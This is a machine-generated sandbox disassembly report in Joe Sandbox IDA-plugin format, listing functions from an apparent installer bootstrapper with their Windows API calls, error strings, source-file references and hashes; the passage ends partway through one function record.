Instruction Fuzzy Hash: F2015E71245304FFFB089BA59D16BBE76E5EB00711F10452EBD16E51E0EB798A00A628

Function 000AF586 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 000AF59B
LeaveCriticalSection.KERNEL32(?), ref: 000AF6A8

Strings

Engine is active, cannot change engine state., xrefs: 000AF5B5
UX denied while trying to set source on embedded payload: %ls, xrefs: 000AF61D
UX requested unknown container with id: %ls, xrefs: 000AF667
Failed to set source path for container., xrefs: 000AF68D
Failed to set source path for payload., xrefs: 000AF637
UX requested unknown payload with id: %ls, xrefs: 000AF607

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-4121889706
Opcode ID: ac9dd9e5ec05857c2a4b6e3c46b4738b7b55246fa297d6c111fa62dc4c8a2841
Instruction ID: 4e2cf6265e8b028b03e9e8f95104e6cf24ac6b55041a2362e0d666e651a37a08
Opcode Fuzzy Hash: ac9dd9e5ec05857c2a4b6e3c46b4738b7b55246fa297d6c111fa62dc4c8a2841
Instruction Fuzzy Hash: DD310672A40612AF8B219FD5CC46EBEB3ECDF56720B158126F804FB251DB74ED0087A4

Function 000970D4 Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 000970E7

Strings

Failed to allocate buffer for escaped string., xrefs: 000970FE
[\%c], xrefs: 00097146
Failed to copy string., xrefs: 0009719B
[]{}, xrefs: 00097111
Failed to append characters., xrefs: 00097173
Failed to append escape sequence., xrefs: 0009717A
Failed to format escape sequence., xrefs: 00097181

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: lstrlen
String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
API String ID: 1659193697-3250950999
Opcode ID: 05e111c1185961c26f25602257b5e3233c9ab9a8b93d5e9e64e395bbddf8f9dc
Instruction ID: 9f4a8f661f941882de48084d2f4a64ea587946da6c24a5ea7f919d9f1b4de420
Opcode Fuzzy Hash: 05e111c1185961c26f25602257b5e3233c9ab9a8b93d5e9e64e395bbddf8f9dc
Instruction Fuzzy Hash: 3821D833959316BBEF255698DC02FEE77A99F00711F200157F908B6291DB75AE40B2A4

Function 000B59B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,000DB4F0,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,000B659B,?,00000001,?,000DB490), ref: 000B5A19

Strings

Failed grow array of ordered patches., xrefs: 000B5AB2
feclient.dll, xrefs: 000B5A0F, 000B5B39
Failed to insert execute action., xrefs: 000B5A6E
Failed to copy target product code., xrefs: 000B5B4C
Failed to plan action for target product., xrefs: 000B5AC4

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
API String ID: 1825529933-3477540455
Opcode ID: 34f4c376a6aecddf51933ee3a6ef7da4019436020e488173fb61db20e1824ef2
Instruction ID: 36e4697f16460264aad2afc62d26171f96cd79d055fcf3de4417bd4f4db8cc4b
Opcode Fuzzy Hash: 34f4c376a6aecddf51933ee3a6ef7da4019436020e488173fb61db20e1824ef2
Instruction Fuzzy Hash: E08112B560074AAFCB14CF58C880AAA77E5FF08325F1586AAEC159B352D770EC11CF90

Function 000B9039 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 171COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,000A6F20,000000B8,0000001C,00000100), ref: 000B9068
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,000DB4A8,000000FF,?,?,?,000A6F20,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 000B9101

Strings

BA aborted detect forward compatible bundle., xrefs: 000B916D
detect.cpp, xrefs: 000B9163
comres.dll, xrefs: 000B9187
Failed to initialize update bundle., xrefs: 000B91A9

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
API String ID: 1825529933-439563586
Opcode ID: 391307df022ae06bbb893c2c1869eea5cdde4f96064810073134862deb354a56
Instruction ID: b5e8f4a802b6310d00de86d9938f6ba1dfa9742f056addab9ed4fdd2361aef6f
Opcode Fuzzy Hash: 391307df022ae06bbb893c2c1869eea5cdde4f96064810073134862deb354a56
Instruction Fuzzy Hash: 3E51E271600216BFDF55AF78CC85EAAB7AAFF05320B104664FA15DA291D731DC60EBA0

Function 000CC9BD Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,000CD132,?,00000000,?,00000000,00000000), ref: 000CC9FF
__fassign.LIBCMT ref: 000CCA7A
__fassign.LIBCMT ref: 000CCA95
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 000CCABB
WriteFile.KERNEL32(?,?,00000000,000CD132,00000000,?,?,?,?,?,?,?,?,?,000CD132,?), ref: 000CCADA
WriteFile.KERNEL32(?,?,00000001,000CD132,00000000,?,?,?,?,?,?,?,?,?,000CD132,?), ref: 000CCB13

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: b0a03acbdff394cde8f0c5bfbc2281b864d6f0dc3c5a6515774c9560f3aed3e1
Instruction ID: 71bce5db5cea3b1fd1cae43b0153c8ca5d7464a495f3d55acbc641c41684bda1
Opcode Fuzzy Hash: b0a03acbdff394cde8f0c5bfbc2281b864d6f0dc3c5a6515774c9560f3aed3e1
Instruction Fuzzy Hash: 89516D71A002499FEB10CFA8D985FEEBBF8EF49310F14415EE959E7291E7309941CBA1

Function 000D01F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 000D0234
GetComputerNameW.KERNEL32(?,?), ref: 000D028C

Strings

Computer : %ls, xrefs: 000D02FA
--- logging level: %hs ---, xrefs: 000D034C
=== Logging started: %ls ===, xrefs: 000D02B7
Executable: %ls v%d.%d.%d.%d, xrefs: 000D02E8

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Name$ComputerFileModule
String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
API String ID: 2577110986-3153207428
Opcode ID: e15784dadb84a224298927fe3593c6d50971ec51d67c60d9f5678d3ece00d240
Instruction ID: 13a388750cbc4ced7d4454b4cc90686032c85328f4337667a590cbe0f923f354
Opcode Fuzzy Hash: e15784dadb84a224298927fe3593c6d50971ec51d67c60d9f5678d3ece00d240
Instruction Fuzzy Hash: 994165F1A0031C9BDB609F649C89EFA77BCEB45300F4041AAFA0DA7602D6349E859F75

Function 000D143C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringregistryCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,BundleUpgradeCode,?,00020006,00000000,?,?,?,00000001), ref: 000D1479
lstrlenW.KERNEL32(?,00000000,00000000,?,00000000,00000001,00000000,00000000,BundleUpgradeCode,?,00020006,00000000,?,?,?,00000001), ref: 000D14F1
lstrlenW.KERNEL32(?,?,?,?,00000001), ref: 000D14FD
RegSetValueExW.ADVAPI32(00020006,?,00000000,00000007,00000000,?,00000000,?,?,00000000,00000001,00000000,00000000,BundleUpgradeCode,?,00020006), ref: 000D153D

Strings

BundleUpgradeCode, xrefs: 000D1442
regutil.cpp, xrefs: 000D1565

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: lstrlen$Value
String ID: BundleUpgradeCode$regutil.cpp
API String ID: 198323757-1648651458
Opcode ID: 4ce049ce531f54190e76fc9bc555c99c61ce9cc2077ca0b43cb9044178aa01df
Instruction ID: 68133f2a3d7cb0cc66b001f353b729adacd2398ac7617f528701c2cbd3001dc6
Opcode Fuzzy Hash: 4ce049ce531f54190e76fc9bc555c99c61ce9cc2077ca0b43cb9044178aa01df
Instruction Fuzzy Hash: EC41A632A00726EFCF21DFA8D845AEE7BAAAF44710F11416AFD05A7251DA34DD119BA0

Function 000AD206 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 120COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,00000001,000DB4F0,?,00000001,000000FF,?,?,75C0B390,00000000,00000001,00000000,?,000A72F3), ref: 000AD32F

Strings

Failed to elevate., xrefs: 000AD311
Failed to create pipe name and client token., xrefs: 000AD270
Failed to connect to elevated child process., xrefs: 000AD318
Failed to create pipe and cache pipe., xrefs: 000AD28C
elevation.cpp, xrefs: 000AD23A
UX aborted elevation requirement., xrefs: 000AD244

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CloseHandle
String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
API String ID: 2962429428-3003415917
Opcode ID: 4d6ada41d24e9b48b6a7ae0a2ef93905c22fcd8e536acefba8c9727f3c592df7
Instruction ID: 2d6afe05beb6e5519a5a7a418f504e07392342417cffb57373dca69ff6297d25
Opcode Fuzzy Hash: 4d6ada41d24e9b48b6a7ae0a2ef93905c22fcd8e536acefba8c9727f3c592df7
Instruction Fuzzy Hash: C9310D73A45711BEEF2556E09C46FEF775C9F02720F100217FA0ABA182DA51AE0083A6

Function 000D041B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000FB60C,00000000,?,?,?,00095407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000D042B
CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,000FB604,?,00095407,00000000,Setup), ref: 000D04CC
GetLastError.KERNEL32(?,00095407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000D04DC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00095407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000D0515

Part of subcall function 00092DE0: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00092F1F

LeaveCriticalSection.KERNEL32(000FB60C,?,?,000FB604,?,00095407,00000000,Setup,_Failed,txt,00000000,00000000,00000000,?,?,?), ref: 000D056E

Strings

logutil.cpp, xrefs: 000D04FA

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
String ID: logutil.cpp
API String ID: 4111229724-3545173039
Opcode ID: e05253c11496444ca53229c138cd50057bf43015e5849c8853e9bb5734a80590
Instruction ID: d26070519b56a89d8e99bc8a7d5a6fc9e0f2fa3398b83b5aa0de509417fec3e0
Opcode Fuzzy Hash: e05253c11496444ca53229c138cd50057bf43015e5849c8853e9bb5734a80590
Instruction Fuzzy Hash: DA317571A01719AFEB21AF61EC45FAB36A8EB01790F410126FE04EA251D779CD40EFB0

Function 000B3750 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000B37B7

Strings

Failed to escape string., xrefs: 000B3839
Failed to append property string part., xrefs: 000B382B
%s%="%s", xrefs: 000B37EA
Failed to format property string part., xrefs: 000B3832
Failed to format property value., xrefs: 000B3840

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
API String ID: 3613110473-515423128
Opcode ID: 8686e728e3356580c668ece72f975f2c6a79a869cf89732b16fd4564744d3941
Instruction ID: 93f7ec850bf07494a9d537e72089c1017479578f377c4bbe07b21d15c5e8ae71
Opcode Fuzzy Hash: 8686e728e3356580c668ece72f975f2c6a79a869cf89732b16fd4564744d3941
Instruction Fuzzy Hash: AA31B2B294531AFFDF259E94CC42EEEB7A8EF00B00F20416AF90176242DB719F509B91

Function 00097203 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 92COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,0009583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 00097215
LeaveCriticalSection.KERNEL32(00000000,00000000,00000002,00000000,?,?,?,0009583F,000002C0,000002C0,00000000,00000100,00000001,00000000,000002C0,00000002), ref: 000972F4

Strings

*****, xrefs: 000972B0, 000972BD
Failed to get variable: %ls, xrefs: 00097256
Failed to format value '%ls' of variable: %ls, xrefs: 000972BE
Failed to get value as string for variable: %ls, xrefs: 000972E3
Failed to get unformatted string., xrefs: 00097285

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-2873099529
Opcode ID: 4639d7af4eacff39d67a6fdb5882d3934c39f0a5e2849a7c7a221c2474e8b3db
Instruction ID: fb772110f0661bd1e7ba64e807b67cba7c73c11e3c053df03023c0c5181cdb49
Opcode Fuzzy Hash: 4639d7af4eacff39d67a6fdb5882d3934c39f0a5e2849a7c7a221c2474e8b3db
Instruction Fuzzy Hash: A131C03792461AFBDF229B90CC01F9E7B75EF14720F104226F9086A251D736AA50EBE4

Function 000A8BE5 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,-00000004,00000000), ref: 000A8C30
GetLastError.KERNEL32(?,?,?,00000001), ref: 000A8C3A
SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 000A8C9A

Strings

Failed to allocate administrator SID., xrefs: 000A8C16
cache.cpp, xrefs: 000A8C5E
Failed to initialize ACL., xrefs: 000A8C68

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: 73d166d142fed46387e810279b45a3c20415efacb7645bd08095565f8465d4d2
Instruction ID: 04ff82f492342cc2fec71341dc2ed82b299dce85acfc284858cfb7aada86c31e
Opcode Fuzzy Hash: 73d166d142fed46387e810279b45a3c20415efacb7645bd08095565f8465d4d2
Instruction Fuzzy Hash: 8821DB72E45314BBEB205AD59C85F9AB7A9EB01750F11812AFD04F7180EA715E005BB0

Function 0009410D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,000A3ED4,00000001,feclient.dll,?,00000000,?,?,?,00094A0C), ref: 00094148
GetLastError.KERNEL32(?,?,000A3ED4,00000001,feclient.dll,?,00000000,?,?,?,00094A0C,?,?,000DB478,?,00000001), ref: 00094154
GetCurrentDirectoryW.KERNEL32(00000000,?,?,00000000,?,?,000A3ED4,00000001,feclient.dll,?,00000000,?,?,?,00094A0C,?), ref: 0009418F
GetLastError.KERNEL32(?,?,000A3ED4,00000001,feclient.dll,?,00000000,?,?,?,00094A0C,?,?,000DB478,?,00000001), ref: 00094199

Strings

crypt32.dll, xrefs: 00094111
dirutil.cpp, xrefs: 000941BD

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryErrorLast
String ID: crypt32.dll$dirutil.cpp
API String ID: 152501406-1104880720
Opcode ID: a564adf7d3e973add63ac0cc60c89948cd42e55e2e5cc40a8a71cb1d938b203d
Instruction ID: 62a3d66bb85ce7414151c009bcef269e8e61be1487caee9d04552342d60468bb
Opcode Fuzzy Hash: a564adf7d3e973add63ac0cc60c89948cd42e55e2e5cc40a8a71cb1d938b203d
Instruction Fuzzy Hash: D5119A76A01727EBEB219AA94CC4EABB7DCDF14751B120136FD04E7250E765CC41A6F0

Function 0009999B Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 000999B6
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,00000100), ref: 000999CE
GetLastError.KERNEL32 ref: 000999D9

Strings

Failed while searching directory search: %ls, for path: %ls, xrefs: 00099A16
Failed to set variable., xrefs: 00099A4E
Failed to format variable string., xrefs: 000999C1

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: d49eb481f6a7cd1469daf44806ce7a72a9857f0eedf9ace8f37c09eb66c49eb7
Instruction ID: 1c9beb4725ea83222efe2c053e3b2293ee361c659a6c8bf17daaf219fb32472b
Opcode Fuzzy Hash: d49eb481f6a7cd1469daf44806ce7a72a9857f0eedf9ace8f37c09eb66c49eb7
Instruction Fuzzy Hash: 1D210B32E40224FBDF11AAACCC02BADF765EF15320F21831AFD10B6151D7319E50AAE2

Function 000B08F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 000B0940
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000B095F
GetLastError.KERNEL32 ref: 000B0969

Strings

Failed to write during cabinet extraction., xrefs: 000B0997
cabextract.cpp, xrefs: 000B098D
Unexpected call to CabWrite()., xrefs: 000B0923

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: b35c574b58d94bb285d9efcbcc9433de2e0211671abe94eae0e12f79b6ba85b2
Instruction ID: 417ac5ad284e00dc7ba3313b469864cb1bfda381266a781157f7648914110091
Opcode Fuzzy Hash: b35c574b58d94bb285d9efcbcc9433de2e0211671abe94eae0e12f79b6ba85b2
Instruction Fuzzy Hash: 4121CA76200200EFEB00DF6DDD84EAA77E9EF88320F11005AFE08CB252D631EA008B60

Function 000B09B8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 000B0A25
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000B0A37
SetFileTime.KERNEL32(?,?,?,?), ref: 000B0A4A
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,000B0616,?,?), ref: 000B0A59

Strings

cabextract.cpp, xrefs: 000B09F4
Invalid operation for this state., xrefs: 000B09FE

Memory Dump Source

Source File: 00000001.00000002.3579500001.0000000000091000.00000020.00000001.01000000.00000005.sdmp, Offset: 00090000, based on PE: true

Associated: 00000001.00000002.3579424015.0000000000090000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579589961.00000000000DB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579654705.00000000000FA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3579701407.00000000000FE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_90000_UNK_.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: 00f154e424e80f804800e7147fd53f841de85c14c97258ec22259dfc27b70813
Instruction ID: 0a630a9622c91ad78f52c44cec984d7ed3995e9ad1862798cf63195543a25057
Opcode Fuzzy Hash: 00f154e424e80f804800e7147fd53f841de85c14c97258ec22259dfc27b70813
Instruction Fuzzy Hash: C821C372900219ABC750DFA8DC488EBBBBCFF08720B14461AF825E65D0D775EA11CBA1

Function 000D8803 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 69timeCOMMON

Download Yara Rule

APIs

